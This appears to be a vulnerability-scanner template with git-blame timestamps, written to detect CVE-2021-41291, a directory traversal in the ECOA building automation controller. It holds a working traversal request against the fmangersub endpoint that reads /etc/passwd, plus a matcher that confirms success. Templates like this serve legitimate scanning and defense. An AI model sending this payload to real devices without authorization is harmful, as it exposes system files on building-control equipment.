2021-10-14 14:38:44 +00:00
id : CVE-2021-41291
2021-09-24 23:58:58 +00:00
info :
name : ECOA Building Automation System - Directory Traversal Content Disclosure
author : gy741
severity : high
2022-05-17 09:18:12 +00:00
description : The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.
2021-10-14 14:20:43 +00:00
reference :
2022-03-06 17:04:24 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-41291
2021-10-14 12:59:38 +00:00
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
2022-05-17 09:18:12 +00:00
- https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html
2021-10-14 14:40:51 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-10-14 14:40:51 +00:00
cve-id : CVE-2021-41291
cwe-id : CWE-22
2023-10-14 11:27:55 +00:00
epss-score : 0.0476
2023-11-10 17:07:52 +00:00
epss-percentile : 0.91801
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : ecoa
product : ecs_router_controller-ecs_firmware
tags : cve,cve2021,ecoa,lfi,traversal
2021-09-24 23:58:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-24 23:58:58 +00:00
- raw :
- |
2021-09-25 05:52:48 +00:00
GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
2021-09-24 23:58:58 +00:00
Host : {{Hostname}}
matchers :
2021-09-25 05:52:48 +00:00
- type : regex
regex :
2022-01-04 19:34:16 +00:00
- "root:.*:0:0:"
2023-11-11 17:38:55 +00:00
# digest: 4a0a0047304502200f6b5375c830f12ae6bbd7d3fcce26be6695d5d7f3b7d8e19a2f31c54d31e14a022100f1e37016baddc04385fb1b00e937d26c4ead41d921816cf8153a573f1e6e6968:922c64590222798bb761d5b6d8e72950